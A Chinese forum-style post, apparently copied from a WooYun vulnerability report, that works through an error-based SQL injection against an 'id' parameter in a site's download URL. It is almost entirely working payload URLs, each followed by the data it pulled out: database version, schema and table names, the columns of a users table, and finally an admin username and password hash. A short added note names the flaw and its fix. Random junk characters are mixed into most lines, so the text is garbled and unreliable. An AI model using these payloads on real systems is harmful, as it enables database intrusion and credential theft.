http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试，没想到这里就有，可以测试一下，做个记录而已。（从请求形式看，下面各条均属基于报错的 SQL 注入：id 路径参数被直接拼入查询，结果经数据库报错信息回显；修复应对该参数使用参数化查询，并关闭对外的数据库错误输出。）
8 Q0 x: D$ Z: E1 G8 Q
1 \$ A4 T8 ?! W* @http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
1 P$ g. j, Z, l" h! @+ f8 k: f& ^% F* J7 ~/ a: {- |! Z4 \
/data0/htdocs/leqi_new/app/myapp.php
7 h! y# i5 ]4 W ?7 A- r9 Q
或者
: e. [3 c' K9 m8 _: ?$ }2 I
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 r5 q+ _8 a# T7 Y% _, L) \
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 x+ g! V4 K) d0 p' n5 q: {
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. w* F7 x# ?9 j& E
2 f# m& L( n8 Y6 ~! n
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& Z5 N. w* S( A7 G/ U7 H2 h- s# z1 binformation_schema' p2 C5 C- {2 S1 L: {$ @
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003+ K; e d- a* w
leqi3 Y# a, k6 k" e8 N' F1 w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
B3 u: e- l6 |) y6 q% h% E6 Vtest0 |6 m) U E) P) Q& i0 {- y
/ g# L* d; l- o& J0 V& a2 C4 j4 `% ]
/**********limit依次递归爆表名**********/
+ t2 F! ^0 H% g( f% Zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 }: ]7 y8 d& s3 T
users; N5 J& A+ D* v& K3 G8 E2 \: [
& \8 a( }' }* Y, u
/**********limit依次递归爆字段名**********/
8 a7 a9 g+ s( Z7 _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, U! D4 p! p" |6 u! r1 E7 K" [1 ]: \/ suser_id,username,nickname,passwd,group_id
/ X" S0 ]* j- [0 R1 l2 F mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23 ?2 ~0 Z6 A+ q9 y7 n
/wapc/5000_0005_003
- e/ F8 b# k3 N4 X3 L+ L, c- I& [11 21+ ^, o/ o% b! u7 F( U* {0 Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 {' }( B! }* q5 v
/wapc/5000_0005_003& H, N x$ c8 p
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
- a* F2 ] \+ g5 K- ]$ U+ \admin
; o5 O, Z$ m* Y" `! [ `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
9 ?- @0 ]$ B2 C6a8b4574ca231eb8bd52764d4978ffcd9 y5 s: O' Q- _% f
: u: x* q) l/ E
' _) c+ @9 w7 u/ p ] j6 ?7 J |